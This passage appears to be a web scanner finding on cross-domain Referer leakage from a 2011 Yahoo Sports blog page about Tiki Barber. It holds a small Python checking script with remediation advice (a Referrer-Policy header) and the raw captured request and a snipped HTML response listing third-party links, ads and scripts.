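# Constructed sample modelled on the finding (not the actual response body).
PAGE_URL = ("http://sports.yahoo.com/nfl/blog/shutdown_corner/post/"
            "Tiki-Barber-remains-unemployed-and-sad?urn=nfl-wp6443")
SAMPLE_HEADERS = {"Content-Type": "text/html;charset=utf-8", "Cache-Control": "private"}
SAMPLE_HTML = """
<html><body>
<a href="/nfl/blog/shutdown_corner" title="Shutdown Corner">same-origin link</a>
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="thumb">
<IFRAME SRC="http://ad.yieldmanager.com/st?ad_type=iframe"></IFRAME>
<li><a href="http://www.footballoutsiders.com/" title="Football Outsiders">Football Outsiders</a>
<li><a href="http://espn.go.com/blog/nflnation" title="Hashmarks">Hashmarks</a>
<a href="http://digg.com/submit?phase=2&url=..." class="digg" target="_new">digg</a>
<a href="http://www.facebook.com/sharer.php?u=..." class="facebook" target="_new">fb</a>
</body></html>
"""

if __name__ == "__main__":
    report = referer_leakage(PAGE_URL, SAMPLE_HEADERS, SAMPLE_HTML)
    for host in report["hosts"]:
        print("cross-domain target:", host)
    print("query string can leak via Referer:", report["leaks_query"])
```

Run as-is, the script lists the six third-party hosts in the constructed body and reports the leak because no Referrer-Policy is set; adding a Referrer-Policy: strict-origin-when-cross-origin header (or the equivalent meta tag) to the response clears it, as does removing the query string from the URL. Whether a given leak matters depends on what the query carries: an article id like urn=nfl-wp6443 is harmless, a session token or search term is not, and the check cannot tell those apart on its own.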

Request

GET /nfl/blog/shutdown_corner/post/Tiki-Barber-remains-unemployed-and-sad?urn=nfl-wp6443 HTTP/1.1
Host: sports.yahoo.com
Proxy-Connection: keep-alive
Referer: http://frontier.my.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:44:41 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Vary: Host,Accept-Encoding
Set-Cookie: MwPhCom_degraded_status=false; path=/
Content-Type: text/html;charset=utf-8
Cache-Control: private
Age: 6
Proxy-Connection: keep-alive
Via: HTTP/1.1 r1.ycpi.s1s.yahoo.net (YahooTrafficServer/1.19.5 [cMsSf ])
Server: YTS/1.19.5
Content-Length: 291643

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Tiki Barber remains unemployed and sad - Shutdown Corner - NFL&nbsp;Blog - Yahoo! Spor
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Yahoo! Sports - National Football League News" href="/nfl/rss.xml">

<link rel="stylesheet" type="text/css" media="screen" href="http://l.yimg.com/j/assets/eJx1j-FuhCAQhJ9IBQ8R0ochFPZ6JMqaXWzj21fFJueP_loyfLszE5i7bU1d39pWdAQMpXliLtx8UYrckhxHo_VH2DlOBX5SBJf9t3uBj0DuiViAdsxIpcaKLUiFq2QepxRwnjF3n55h14dxGC4UPIWX88yJSzennOrT9UJYYXoh9cMcG1rL_v3SxkszY_ybp5m25j8kBcy3jBezTH4DynuFs6ky4pY3Jg4T8kpnaiWNff8NnnBlmI5NbW3Ndzjxzap6uFr1Cqp-ARhQf5A,.css?z&m" />
<link rel="stylesheet" type="text/css" media="screen" href="http://l.yimg.com/j/assets/eJxtUOlugzAMfqJ1hOYA7WGiNDEQLQeKQzvefiFUAqb9svSdtjXi5wAqLwmMfLg44i2RjjTN_UsXCn5mSHnD6L1tScWm6EE6UAZzTKt8u6uv6Xl_aHw0i9sJwsQeqKP3MZSxhGziKxRScCb25BI6LiBRT7A5L62DClnhegmlVJx8tRNn0Haw-qQTXcO7qntaA_GC5KT0N6RLmtJyKtc5G_7UoI4J8mTDVR7wBQnlQ5kRJLnRrUAIyirr1_M5x4Pef1hx_iib1nn8uiOEs_9kYXCF5qRn7S-GjZe9.css?z&m" />
<link rel="stylesheet" type="text/css" media="screen" href="http://l.yimg.com/j/assets/eJxVkGuOwyAMhE_UPIEQ9TCRQ5wWieIKk-329suj0qa_kPzNMGMb5vZ92HZo5qZrAzLGy04-8uUW7MZN6KdJK3U1SWfo8SDfrsCY5nKScirzf79JTrAeQ_HNw1j46ui24G_E4MEtd4StCtQo6gdsI77shouHnw9fdqJYZLoXH9nTwTsRRgjmXoiaRSE7QjwCbkuO4oK6bjyXzg-mtRIT4zD0ZxaJ3Ao5S8l-rDYI0RqHX_n589xbT2I--2svn_qWewn9Hb1ZNo449ctXE72uZiZj0znWI0by2Si1ErXXi6Ds12kt_wDHPo2P.css?z&m" />
<link rel="stylesheet" type="text/css" media="print" href="http://l.yimg.com/j/assets/eJx1kO2KwyAQRZ8oSZP6SR9GrJm0gjrFMV3y9qspyyaw-0s491wujiMattUPU6_7y5CBoHQLpkLdI_uZ-jxKqYS4ueo5jBHTcLcElXPJuTxyZzOuBKF1hNbTMfvyc-uw6zSNR77Rq4s4_7xVUaPQ6j-lgI27w5j8y0lLWxej5p_1J0YwNVgD0N7j8vobBLAzFcybWcCWNX-cixZ6d7zDRKc18gXaT0yyb_OsbchmQSyQT5rNxbsAJ3YP-GiHUZLp2yv7VMwBM6mY-gYK3IZE.css?z&m" />
<script>
...[SNIP]...
</script>
<script charset="utf-8" src="http://l.yimg.com/j/assets/eJx9kOGOgyAQhJ9IRRSF3MOYLa6VVsAAXuPbH0gv8ZKzvyAz3yyzPHy1b6qipShJui0WRnSFVqZ0dd_zhn89zsho9bWJ32jCtS2tMSiDsuaaAaM0fEYe_n-3KZu8w9tk0WTJ9AhOzgN4r3yooqnydaCECMIpqbuGx0DbUFqnQCzqA5jgjydodzzhV-veSstEUhxODv18Tga4_SJdnmSfChPRc9YmZbYaB23HbcE_w4KST3RJ6RgjSXkpM9rXmfHSOgxzXr3rBU3iusCObshLnrs4WNWY_oHGfBK2JeT54vCnZbdbVnj9bqu1NdXu1yI2PM4R3AKJER1vL5jcwNiAhQYD97zGh8AEEm_xZyLG65bXF5hCUazKFMGBfCpzT1MJY_wH0NjgNg,,.js?z&m"></script>
...[SNIP]...
</script>

<script type="text/javascript" charset="utf-8" src="http://l.yimg.com/j/assets/eJx1kM0OgyAQhJ_IKqD8pA_TbIFULLCG1TT26av00F48bXbmy-xmJmoTZHj4cimsF5yz60SthYIr-fivuUA2Iq3F76pkqu8OldAGiLf7uiyYaXeUEYIfTvIuwBxhq9FKa9nXaEwJc7vR3CR0ddIIxTfL6BuyWOM1Gzg_oe3o7TPkg-oMFyfUHOyTapI0-oSJ8N4igvs-2LNBnp381TEobWodL4Tx2A038gO2NW8j.js?z&m"></script>
...[SNIP]...
<meta property="og:title" content="Tiki Barber remains unemployed and sad" />
<link rel="image_src" href="http://mit.zenfs.com/209/2011/09/TikiBag.jpg" />
<link rel="canonical" href="http://sports.yahoo.com/nfl/blog/shutdown_corner/post/Tiki-Barber-remains-unemployed-and-sad?urn=nfl-wp6443" />
...[SNIP]...
<meta name="msapplication-task" content="name=Photos;action-uri=http://sports.yahoo.com/nfl/gallery;icon-uri=http://sports.yahoo.com/favicon.ico" />

<link rel="stylesheet" type="text/css" href="http://l.yimg.com/zz/combo?d/lib/media/phugc/mwphcom_r141.css&d/lib/yui/2.9.0/build/container/assets/skins/sam/container.css&d/lib/yui/2.9.0/build/fonts/fonts-min.css&d/lib/yui/2.9.0/build/reset/reset-min.css" />
</head>
...[SNIP]...
<h2 id="yahoo-image-logo"><img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-print-logo.png" alt="Yahoo! Sports" /></h2>
...[SNIP]...
<div id="ysp-hd">

<link type='text/css' rel='stylesheet' href='http://l.yimg.com/zz/combo?kx/ucs/uh/css/215/yunivhead-min.css&kx/ucs/uh/css/221/logo-min.css&kx/ucs/search/css/180/search_all-min.css&kx/ucs/search/css/170/search_buttons-min.css'/><style>
...[SNIP]...
</script><script id="load_wrapper" type="text/javascript" src="http://mi.adinterax.com/wrapper.js"></script>
...[SNIP]...
<!--Vendor: Factor TG, Format: Pixel, IO: 774106--><SCRIPT LANGUAGE="JavaScript" SRC="http://as1.suitesmart.com/99917/G15493.js?GID=15493"></SCRIPT>
...[SNIP]...
<a href="/nfl/blog/shutdown_corner" title="Shutdown Corner - NFL "><img src="http://l.yimg.com/a/i/us/sp/fn/ed/blog/rev/blogheader_shutdowncorner.jpg" alt="Shutdown Corner - NFL "></a>
...[SNIP]...
<p><img src="http://l.yimg.com/a/p/sp/editorial_image/ad/ad9eec7900e325e007145dabe8abc77a/tiki_barber_remains_unemployed_and_sad.jpg" width="270" /="/" align="right" src="http://mit.zenfs.com/209/2011/09/TikiBag.jpg" height="405" hspace="8" class="alignright size-full wp-image-6444" title="TikiBag" alt="Tiki Barber remains unemployed and sad">When Tiki Barber told HBO that <a href="http://sports.yahoo.com/nfl/blog/shutdown_corner/post/Tiki-Barber-8217-s-return-to-football-is-a-trea?urn=nfl-wp2735">
...[SNIP]...
<p>Now that NFL rosters are set at 53, and Tiki Barber never got to sniff one, I hope that's not true. <a href="http://sportsillustrated.cnn.com/2011/writers/peter_king/09/05/laborday/1.html">According to Peter King at Sports Illustrated, Tiki isn't taking it well</a>
...[SNIP]...
<p>Where this will leave Tiki Barber the person, I don't know. He's also <a href="http://www.huffingtonpost.com/2011/08/30/tiki-barber-traci-lynn-johnson-engaged_n_942415.html">recently proposed to his girlfriend</a>
...[SNIP]...
="http://us.lrd.yahoo.com/_ylc=X3oDMTF0YjliOWY5BHRtX2RtZWNoA1RleHQgTGluawR0bV9sbmsDVTExNzE1MTUEdG1fbmV0A1lhaG9vBHRtX3BvcwNjZW50ZXI-/SIG=11mhsvns4/**http%3A//football.fantasysports.yahoo.com/f1/signup"><img src="http://l.yimg.com/a/p/sp/tools/med/2011/09/ipt/1314989147.jpg" border="0" alt=""/></a>
...[SNIP]...
<br />
... <a href="http://yhoo.it/nxJyoy">Colts delay Jim Tressel's employment</a><br />
... <a href="http://yhoo.it/phyJNx">Video: The NFL's most critical offseason moves</a><br />
... <a href="http://yhoo.it/mSN2e5">High school wrestler's 9/11 tie to President Bush</a>
...[SNIP]...
<!--{ULT:BEGIN-SECTION;sec=foot-digg}-->
<a href="http://digg.com/submit?phase=2&url=http%3A%2F%2Fsports.yahoo.com%2Fnfl%2Fblog%2Fshutdown_corner%2Fpost%2FTiki-Barber-remains-unemployed-and-sad%3Furn%3Dnfl-wp6443&title=Tiki+Barber+remains+unemployed+and+sad&ts=1315313084" class="digg" title="Digg.com" target="_new"><strong>
...[SNIP]...
<!--{ULT:BEGIN-SECTION;sec=foot-facebook}-->
<a href="http://www.facebook.com/sharer.php?u=http%3A%2F%2Fsports.yahoo.com%2Fnfl%2Fblog%2Fshutdown_corner%2Fpost%2FTiki-Barber-remains-unemployed-and-sad%3Furn%3Dnfl-wp6443&title=Tiki+Barber+remains+unemployed+and+sad&ts=1315313084" class="facebook" title="Facebook" target="_new"><strong>
...[SNIP]...
<!--{ULT:BEGIN-SECTION;sec=foot-twitter}-->
<a href="http://twitter.com/home?status=http%3A%2F%2Fsports.yahoo.com%2Fnfl%2Fblog%2Fshutdown_corner%2Fpost%2FTiki-Barber-remains-unemployed-and-sad%3Furn%3Dnfl-wp6443" class="twitter" title="Twitter" target="_new"><strong>
...[SNIP]...
81/L=0QKTVmKIPE7pARpjTl.wjQLGMhd7ak5mFbkACuv1/B=6SzPKdj8fcA-/J=1315313081873363/K=dHuXEgTLQ4cGOnShgI49sw/A=6418146/R=0/SIG=11j13n4o5/*http://football.fantasysports.yahoo.com/f1/signup" target="_blank"><img src="http://ads.yimg.com/a/a/ya/yahoo_sports8/yahoo!_fantasy_football11_smb_630x31.jpg" alt="click here" width="630" height="31" border="0"></a>
...[SNIP]...
<a href="http://pulse.yahoo.com/_OA3RIOXRBGNLY2AQTW2YKVOOLI">

<img id="com_14641504_OA3RIOXRBGNLY2AQTW2YKVOOLI" class="imageloader_classname" width="48" height="48" alt="whitey" src="http://l.yimg.com/a/i/us/nws/2008/news/us/assets/common/images/transparent.png" style="background:url(http://l.yimg.com/a/i/identity2/profile_48a.png);"></a>
...[SNIP]...
<a href="http://pulse.yahoo.com/_ZGAAUPA4UQ74QYKQM4FCHVUJ2Q">

<img id="com_14641496_ZGAAUPA4UQ74QYKQM4FCHVUJ2Q" class="imageloader_classname" width="48" height="48" alt="mcman44" src="http://l.yimg.com/a/i/us/nws/2008/news/us/assets/common/images/transparent.png" style="background:url(http://l.yimg.com/a/i/identity2/profile_48b.png);"></a>
...[SNIP]...
<a href="http://pulse.yahoo.com/_FTLQMXZ2XX7F44ZPMMQOHWWURA">

<img id="com_14641490_FTLQMXZ2XX7F44ZPMMQOHWWURA" class="imageloader_classname" width="48" height="48" alt="JOEK" src="http://l.yimg.com/a/i/us/nws/2008/news/us/assets/common/images/transparent.png" style="background:url(http://l.yimg.com/a/i/identity2/profile_48e.png);"></a>
...[SNIP]...
<a href="http://pulse.yahoo.com/_3XCD7V2IBRT43HCIJKHNWX4SZI">

<img id="com_14641475_3XCD7V2IBRT43HCIJKHNWX4SZI" class="imageloader_classname" width="48" height="48" alt="concerned citizen" src="http://l.yimg.com/a/i/us/nws/2008/news/us/assets/common/images/transparent.png" style="background:url(http://l.yimg.com/a/i/identity2/profile_48d.png);"></a>
...[SNIP]...
<a href="http://pulse.yahoo.com/_LIMI7M6SXLQ42FGCL5XIGPOHOI">

<img id="com_14641471_LIMI7M6SXLQ42FGCL5XIGPOHOI" class="imageloader_classname" width="48" height="48" alt="Shelby" src="http://l.yimg.com/a/i/us/nws/2008/news/us/assets/common/images/transparent.png" style="background:url(http://l.yimg.com/a/i/identity2/profile_48d.png);"></a>
...[SNIP]...
<a href="http://pulse.yahoo.com/_33CGMYSFB4K5BQKR3QB23X7DSI">

<img id="com_14641464_33CGMYSFB4K5BQKR3QB23X7DSI" class="imageloader_classname" width="48" height="48" alt="Bruce" src="http://l.yimg.com/a/i/us/nws/2008/news/us/assets/common/images/transparent.png" style="background:url(http://l.yimg.com/a/i/identity2/profile_48b.png);"></a>
...[SNIP]...
<a href="http://pulse.yahoo.com/_IZRO2VV6RFWS7INK2VIVWBS46M">

<img id="com_14641463_IZRO2VV6RFWS7INK2VIVWBS46M" class="imageloader_classname" width="48" height="48" alt="thatgirl" src="http://l.yimg.com/a/i/us/nws/2008/news/us/assets/common/images/transparent.png" style="background:url(http://avatars.zenfs.com/users/1AxKBKy6NAAEB-IFDFFA=.medium.png);"></a>
...[SNIP]...
<a href="http://pulse.yahoo.com/_2DW3OMNCFZWIQQDTZ6AXB7AYWM">

<img id="com_14641458_2DW3OMNCFZWIQQDTZ6AXB7AYWM" class="imageloader_classname" width="48" height="48" alt="DICKENS" src="http://l.yimg.com/a/i/us/nws/2008/news/us/assets/common/images/transparent.png" style="background:url(http://l.yimg.com/a/i/identity2/profile_48d.png);"></a>
...[SNIP]...
<a href="http://pulse.yahoo.com/_IZRO2VV6RFWS7INK2VIVWBS46M">

<img id="com_14641450_IZRO2VV6RFWS7INK2VIVWBS46M" class="imageloader_classname" width="48" height="48" alt="thatgirl" src="http://l.yimg.com/a/i/us/nws/2008/news/us/assets/common/images/transparent.png" style="background:url(http://avatars.zenfs.com/users/1AxKBKy6NAAEB-IFDFFA=.medium.png);"></a>
...[SNIP]...
<a href="http://pulse.yahoo.com/_VICKDI7FNMKYQ3QZZBP6HK6XTA">

<img id="com_14641448_VICKDI7FNMKYQ3QZZBP6HK6XTA" class="imageloader_classname" width="48" height="48" alt="Felix" src="http://l.yimg.com/a/i/us/nws/2008/news/us/assets/common/images/transparent.png" style="background:url(http://a323.yahoofs.com/coreid/49bb55e9i2197z/oRJR4kQ3c6RdFBJIcqizfmISUPs-/100/tn48.jpg?ciAa60QBO4C663dh);"></a>
...[SNIP]...
<a href="http://pulse.yahoo.com/_OLUNPBS7ETLZEMC4POMRFP2PPY">

<img id="com_14641444_OLUNPBS7ETLZEMC4POMRFP2PPY" class="imageloader_classname" width="48" height="48" alt="Dan Kraybill" src="http://l.yimg.com/a/i/us/nws/2008/news/us/assets/common/images/transparent.png" style="background:url(http://a323.yahoofs.com/coreid/4c863964i912zul1re3/P6o2Zjs1eqiIcvvUrj0pF4b9HA--/2/tn48.jpg?ciAa60QBqrxsP3u8);"></a>
...[SNIP]...
<a href="http://pulse.yahoo.com/_6BDMBV63PK4OVIMAUYEQBEKQQI">

<img id="com_14641443_6BDMBV63PK4OVIMAUYEQBEKQQI" class="imageloader_classname" width="48" height="48" alt="RollOn2012ObamasOut" src="http://l.yimg.com/a/i/us/nws/2008/news/us/assets/common/images/transparent.png" style="background:url(http://l.yimg.com/a/i/identity2/profile_48b.png);"></a>
...[SNIP]...
<a href="http://pulse.yahoo.com/_YVZTVM2UTKHMMSVGWCFFKYJOMQ">

<img id="com_14641428_YVZTVM2UTKHMMSVGWCFFKYJOMQ" class="imageloader_classname" width="48" height="48" alt="Randy" src="http://l.yimg.com/a/i/us/nws/2008/news/us/assets/common/images/transparent.png" style="background:url(http://a323.yahoofs.com/coreid/4d0bb75fi42dzws105mud/wPKJsyAzbqB_yRiR0Oierg--/1/tn48.jpeg?ciAa60QBss8CKkPn);"></a>
...[SNIP]...
<a href="http://pulse.yahoo.com/_LBQQJENEWI7EGQJ7YZIEWFK34Y">

<img id="com_14641413_LBQQJENEWI7EGQJ7YZIEWFK34Y" class="imageloader_classname" width="48" height="48" alt="Russ" src="http://l.yimg.com/a/i/us/nws/2008/news/us/assets/common/images/transparent.png" style="background:url(http://l.yimg.com/a/i/identity2/profile_48b.png);"></a>
...[SNIP]...
<a href="http://pulse.yahoo.com/_YKANDFIPI6ZJ3BHNKN4X4UV7GA">

<img id="com_14641407_YKANDFIPI6ZJ3BHNKN4X4UV7GA" class="imageloader_classname" width="48" height="48" alt="Bert" src="http://l.yimg.com/a/i/us/nws/2008/news/us/assets/common/images/transparent.png" style="background:url(http://a323.yahoofs.com/coreid/49bb6918if4az/bU1fIok3frQKtlLeu_Pmyw--/101/tn48.jpg?ciAa60QBeXVYnGD5);"></a>
...[SNIP]...
<a href="http://pulse.yahoo.com/_VNOFMKX3YQX6UWKYUQNH7Q2A3Y">

<img id="com_14641400_VNOFMKX3YQX6UWKYUQNH7Q2A3Y" class="imageloader_classname" width="48" height="48" alt="NeilD" src="http://l.yimg.com/a/i/us/nws/2008/news/us/assets/common/images/transparent.png" style="background:url(http://l.yimg.com/a/i/identity2/profile_48d.png);"></a>
...[SNIP]...
<a href="http://pulse.yahoo.com/_6UTWJJBRCWSD6L2GW6LKQBVCLU">

<img id="com_14641399_6UTWJJBRCWSD6L2GW6LKQBVCLU" class="imageloader_classname" width="48" height="48" alt="Bud" src="http://l.yimg.com/a/i/us/nws/2008/news/us/assets/common/images/transparent.png" style="background:url(http://l.yimg.com/a/i/identity2/profile_48a.png);"></a>
...[SNIP]...
<a href="http://pulse.yahoo.com/_VKH2NYGWOZAEWZRDXNTRU2NROE">

<img id="com_14641393_VKH2NYGWOZAEWZRDXNTRU2NROE" class="imageloader_classname" width="48" height="48" alt="Cherry Bear" src="http://l.yimg.com/a/i/us/nws/2008/news/us/assets/common/images/transparent.png" style="background:url(http://avatars.zenfs.com/users/13IW8dv7DAAECPiE_cIpQBl8B.medium.png);"></a>
...[SNIP]...
<a href="http://pulse.yahoo.com/_CYAD7NHXP5RNOOAOUVF3W7YARY">

<img id="com_14641378_CYAD7NHXP5RNOOAOUVF3W7YARY" class="imageloader_classname" width="48" height="48" alt="Starcaster" src="http://l.yimg.com/a/i/us/nws/2008/news/us/assets/common/images/transparent.png" style="background:url(http://avatars.zenfs.com/users/1jKNS1qBGAAECkcmcLb7TCA==.medium.png);"></a>
...[SNIP]...
<a href="http://pulse.yahoo.com/_BKMWFVLSFHWQPIAR2WS7ZQVOV4">

<img id="com_14641370_BKMWFVLSFHWQPIAR2WS7ZQVOV4" class="imageloader_classname" width="48" height="48" alt="Greg" src="http://l.yimg.com/a/i/us/nws/2008/news/us/assets/common/images/transparent.png" style="background:url(http://avatars.zenfs.com/users/1_z0fe50oAAEC2eT6KCAuBA==.medium.png);"></a>
...[SNIP]...
<a href="http://pulse.yahoo.com/_ZR75SZTAKTX7ICZVKNZ6ZPCHPQ">

<img id="com_14641369_ZR75SZTAKTX7ICZVKNZ6ZPCHPQ" class="imageloader_classname" width="48" height="48" alt="Mr Zox" src="http://l.yimg.com/a/i/us/nws/2008/news/us/assets/common/images/transparent.png" style="background:url(http://l.yimg.com/a/i/identity2/profile_48c.png);"></a>
...[SNIP]...
<a href="http://pulse.yahoo.com/_G2LWBYJFFIRFHKYTHNXS4QEJKY">

<img id="com_14641366_G2LWBYJFFIRFHKYTHNXS4QEJKY" class="imageloader_classname" width="48" height="48" alt="" src="http://l.yimg.com/a/i/us/nws/2008/news/us/assets/common/images/transparent.png" style="background:url(http://a323.yahoofs.com/coreid/4c8ad496idb7zul2re3/cqg5RoE8erDAhvZCVf73KhhwEqQ-/9/tn48.jpg?ciAa60QB0X1WZnq0);"></a>
...[SNIP]...
<a href="http://pulse.yahoo.com/_TRZACYYXQX5Y2O24PMFQZ4YJEQ">

<img id="com_14641363_TRZACYYXQX5Y2O24PMFQZ4YJEQ" class="imageloader_classname" width="48" height="48" alt="Victor" src="http://l.yimg.com/a/i/us/nws/2008/news/us/assets/common/images/transparent.png" style="background:url(http://l.yimg.com/a/i/identity2/profile_48c.png);"></a>
...[SNIP]...
<a href="http://pulse.yahoo.com/_KFR7CSJMD23L6SUBPBABCEZLUU">

<img id="com_14641362_KFR7CSJMD23L6SUBPBABCEZLUU" class="imageloader_classname" width="48" height="48" alt="Dave" src="http://l.yimg.com/a/i/us/nws/2008/news/us/assets/common/images/transparent.png" style="background:url(http://a323.yahoofs.com/coreid/4cc87ca7i1b79zws133ac4/Tn_rkFo1erBUVIO0bdyNXIK0spwP/1/tn48.jpeg?ciAa60QBKdrswYJk);"></a>
...[SNIP]...
<a href="http://pulse.yahoo.com/_7CJUUBMQFZ3O6MCEHGOEKQLT5I">

<img id="com_14641361_7CJUUBMQFZ3O6MCEHGOEKQLT5I" class="imageloader_classname" width="48" height="48" alt="Of the domain of the only known" src="http://l.yimg.com/a/i/us/nws/2008/news/us/assets/common/images/transparent.png" style="background:url(http://l.yimg.com/a/i/identity2/profile_48c.png);"></a>
...[SNIP]...
<div id="lrec" class="mod">
<IFRAME FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=NO WIDTH=300 HEIGHT=250 SRC="http://ad.yieldmanager.com/st?_PVID=0QKTVmKIPE7pARpjTl.wjQLGMhd7ak5mFbkACuv1&ad_type=iframe&ad_size=300x250&site=140509&section_code=14445125&cb=1315313081873363&yud=zip%3D%26ycg%3D%26yyob%3D&pub_redirect_unencoded=1&pub_redirect=http://global.ard.yahoo.com/SIG=15rvjh3a9/M=787833.14445125.14291892.1806201/D=sports/S=2022092242:LREC/_ylt=AuXImj6wykRaku7iPAhaBYTSrYZ4/Y=YAHOO/EXP=1315320281/L=0QKTVmKIPE7pARpjTl.wjQLGMhd7ak5mFbkACuv1/B=zyzPKdj8fcA-/J=1315313081873363/K=dHuXEgTLQ4cGOnShgI49sw/A=6261244/R=0/*"></IFRAME>
...[SNIP]...
"http://sports.yahoo.com/nfl/news?slug=jc-cole_peyton_manning_colts_lockout090511&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="Troubling health news for Peyton Manning">
<img src="http://l.yimg.com/iu/api/res/1.2/Dx8ad3BF8vfI6ktnGQZ2Pw--/YXBwaWQ9eXZpZGVvO2NoPTEyMDtjcj0xO2N3PTE4MDtkeD0xO2R5PTE7Zmk9dWxjcm9wO2g9NjM7cT0xMDA7dz05NA--/http://l.yimg.com/a/p/sp/tools/med/2011/09/ipt/1315252981.jpg" title="Troubling health news for Peyton Manning" alt="Troubling health news for Peyton Manning" width="94" height="63">
</a>
...[SNIP]...
<a href="http://sports.yahoo.com/nfl/news?slug=ap-buddyryan-cancer&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="Cancer won't stop Ryan">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
.com/nfl/blog/shutdown_corner/post/Shanahan-names-Rex-Grossman-Redskins-8217-Week?urn=nfl-wp6463&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="Redskins name starting QB">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
oo.com/nfl/blog/shutdown_corner/post/Aaron-Rodgers-8217-handlebar-mustache-gives-hi?urn=nfl-wp6423&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="QB's impressive 'stache">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
/big_league_stew/post/Jerome-Williams-The-Giants-called-me-8216-Jer?urn=mlb-wp18625&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="MLB player called wrong name for years">
<img src="http://l.yimg.com/iu/api/res/1.2/bL85hQglN3ttKnNb7aMbGA--/YXBwaWQ9eXZpZGVvO2NoPTE1NDtjcj0xO2N3PTIyOTtkeD04MjtkeT0xO2ZpPXVsY3JvcDtoPTYzO3E9MTAwO3c9OTQ-/http://l.yimg.com/a/i/ww/news/2011/08/12/williams-pd.jpg" title="MLB player called wrong name for years" alt="MLB player called wrong name for years" width="94" height="63">
</a>
...[SNIP]...
.com/mlb/blog/big_league_stew/post/Blue-Jays-scout-Japan-8217-s-Yu-Darvish-Is-he-?urn=mlb-wp18464&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="Japanese pitching phenom">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
<a href="http://sports.yahoo.com/mlb/news?slug=jp-passan_10_degrees_mvp_candidates_090411&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="Comparing potential MVPs">
<img src="http://l.yimg.com/iu/api/res/1.2/.VekwHIL.XxGYmrIR79ckQ--/YXBwaWQ9eXZpZGVvO2NoPTE2MDtjcj0xO2N3PTI0MDtkeD0xO2R5PTE7Zmk9dWxjcm9wO2g9NjM7cT0xMDA7dz05NA--/http://l.yimg.com/a/p/sp/tools/med/2011/09/ipt/1315203022.jpg" title="Comparing potential MVPs" alt="Comparing potential MVPs" width="94" height="63">
</a>
...[SNIP]...
<a href="http://sports.yahoo.com/nfl/news?slug=ap-colts-manning&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="Tough news for Peyton">
<img src="http://l.yimg.com/iu/api/res/1.2/4gYbQm9TOj0foLKTK6kJxw--/YXBwaWQ9eXZpZGVvO2NoPTE0Nztjcj0xO2N3PTIyMDtkeD0xO2R5PTE7Zmk9dWxjcm9wO2g9NjM7cT0xMDA7dz05NA--/http://l.yimg.com/a/p/sp/tools/med/2011/08/ipt/1314681169.jpg" title="Tough news for Peyton" alt="Tough news for Peyton" width="94" height="63">
</a>
...[SNIP]...
utdown_corner/post/Colts-delay-Tressel-8217-s-employment-until-sev?urn=nfl-wp6446&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="Jim Tressel punished by his new NFL boss">
<img src="http://l.yimg.com/iu/api/res/1.2/tcsbrnHu2XoIp0S0.Ckzsw--/YXBwaWQ9eXZpZGVvO2NoPTE1NDtjcj0xO2N3PTIyOTtkeD04MjtkeT0xO2ZpPXVsY3JvcDtoPTYzO3E9MTAwO3c9OTQ-/http://l.yimg.com/a/i/ww/news/2011/08/12/tressel-pd.jpg" title="Jim Tressel punished by his new NFL boss" alt="Jim Tressel punished by his new NFL boss" width="94" height="63">
</a>
...[SNIP]...
ahoo.com/mlb/blog/big_league_stew/post/Pitcher-Milone-hits-home-run-on-first-pitch-he-s?urn=mlb-wp18507&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="Rookie's rare feat">
<img src="http://l.yimg.com/iu/api/res/1.2/jpYINf57Jv1vBnQgFernXw--/YXBwaWQ9eXZpZGVvO2NoPTE1NDtjcj0xO2N3PTIyOTtkeD04MjtkeT0xO2ZpPXVsY3JvcDtoPTYzO3E9MTAwO3c9OTQ-/http://l.yimg.com/a/i/ww/news/2011/08/12/troop-pd.jpg" title="Rookie's rare feat" alt="Rookie's rare feat" width="94" height="63">
</a>
...[SNIP]...
o.com/mlb/blog/big_league_stew/post/Umpire-West-goes-rogue-on-replay-in-Phillies-Mar?urn=mlb-wp18578&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="Umpire's strange call">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
.com/mlb/blog/big_league_stew/post/Brewers-backup-catcher-George-Kottaras-hits-firs?urn=mlb-wp18532&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="Catcher hits for cycle">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
